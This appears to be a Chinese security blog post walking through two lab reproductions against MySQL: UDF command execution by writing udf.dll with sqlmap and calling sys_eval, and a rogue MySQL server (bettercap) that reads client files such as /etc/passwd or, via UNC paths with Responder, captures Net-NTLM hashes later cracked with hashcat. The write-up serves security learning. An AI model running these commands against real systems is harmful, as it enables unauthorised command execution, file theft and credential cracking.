mysql udf和任意文件读取

一、UDF提权

之前遇到php的环境,都是直接上传大马尝试udf提权,对udf的原理并不了解,今天花时间复现了一下。另外我觉得叫udf提权并不准确,最终的结果是使用mysql执行了系统命令,能不能提权成功取决于运行mysql服务的是不是高权限用户。

漏洞利用条件

  1. 已知mysql root用户的账号密码
  2. 没有secure_file_priv的限制

环境搭建

1.设置mysql允许root外联

use mysql;
grant all privileges on *.* to root@'%' identified by 'root';
flush privileges;

2.设置secure_file_priv

secure_file_priv=
MySQL [(none)]> SHOW VARIABLES LIKE "secure_file_priv";
my.ini

漏洞利用

1.查询mysql绝对路径

select @@basedir;
show variables like "%plugin%";

2.利用ntfs数据流创建plugin文件夹(如果文件夹不存在)

测试发现低版本的mysql可以成功创建文件夹,高版本的没有成功

mysql> select 'xxx' into dumpfile 'C:/phpstudy/MySQL/lib/plugin::$INDEX_ALLOCATION';

3.上传udf.dll文件

mysql版本小于5.1时,导出到c:\windows\system32目录,大于5.1时导出到../lib/plugin目录。
sqlmap和metasploit中都有udf文件,这里使用的msf,文件位置在/usr/share/metasploit-framework/data/exploits/mysql/

sqlmap -d "mysql://root:root@192.168.80.202:3306/mysql" --file-write="/root/lib_mysqludf_sys_32.dll" --file-dest="C:/phpStudy/mysql/lib/plugin/udf.dll"

4.从udf文件中引入自定义函数

MySQL [(none)]> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

5.使用自定义函数执行系统命令

MySQL [(none)]> select sys_eval('whoami');
image.png

二、mysql任意文件读取

原理

mysql的load data local infile函数用于读取客户端的文件并保存在表中,如果攻击者搭建一个伪造的mysql服务器,当有客户端连接这个伪造的mysql服务器时,利用load data local infile函数,攻击者就可以读取客户端主机上的文件。

实现过程

  • 例如,使用kali(192.168.80.130)连接mysql服务器(192.168.80.140)
mysql -uroot -proot -h192.168.80.140
  • 使用load data local infile函数读取kali的/etc/passwd,并存入mysql.host表中
load data local infile "/etc/passwd" into table mysql.host FIELDS TERMINATED BY '\n';
  • 查看mysql.host表,发现读取成功
image.png

linux系统的利用

如果连接伪造MySQL服务器的客户端在linux上运行,我们可以通过以下方法读取linux系统上的文件。

  • 使用bettercap启动一个伪造的mysql服务器
root@kali:~# bettercap -eval "set mysql.server.infile /etc/passwd; mysql.server on"
  • 当有客户端连接时,能读取到客户端主机上的/etc/passwd文件
mysql -uroot -h192.168.80.130 -p
image.png
image.png

windows系统的利用

INFILE支持使用UNC路径的方式,如果连接伪造MySQL服务器的客户端在Windows上运行,我们可以通过以下方法得到windows的Net-NTLM hash。

  • 使用bettercap启动一个伪造的mysql服务器
root@kali:~# bettercap
set mysql.server.infile \\192.168.80.130\test
mysql.server on
image.png
  • 使用responder开启中间人监听
root@kali:~# git clone https://github.com/lgandx/Responder.git
root@kali:~# cd Responder/
root@kali:~/Responder# ./Responder.py -I eth0 -rv
  • 当有客户端使用mysql.exe命令或者使用Navicat连接时,都能获取到他的Net-NTLM hash(不过由于国内运营商封禁了445端口,该利用方式在公网上影响有限)
mysql -uroot -h192.168.80.130 -p
image.png
  • 最后可以使用hashcat来破解哈希值
    -m 指定hash的类型,5600为NetNTLMv2
root@kali:~# hashcat -m 5600 Administrator::WIN-A3QJ128S93I:c780067f2a0ae7bf:B85AE87F3BBF17DD5960DFAD6075A19B:0101000000000000C0653150DE09D201AB26C0BE9B8FEEB9000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000D7006384B53B06B857318D8C05A5C2A66BFC9AFDCD36062540942A9B227E7AE60A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00380030002E00310033003000000000000000000000000000 /root/top100.txt -o rst.txt --force
image.png

影响

  • 一些云服务器控制台的数据迁移功能可能会存在这个漏洞
  • 或者用在蜜罐上读取攻击者的信息

参考

https://www.cnblogs.com/litlife/p/9030673.html
https://www.colabug.com/2019/0408/5936906/
https://www.anquanke.com/post/id/106488

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,911评论 5 460
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 82,014评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 142,129评论 0 320
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,283评论 1 264
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,159评论 4 357
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,161评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,565评论 3 382
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,251评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,531评论 1 292
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,619评论 2 310
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,383评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,255评论 3 313
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,624评论 3 299
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,916评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,199评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,553评论 2 342
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,756评论 2 335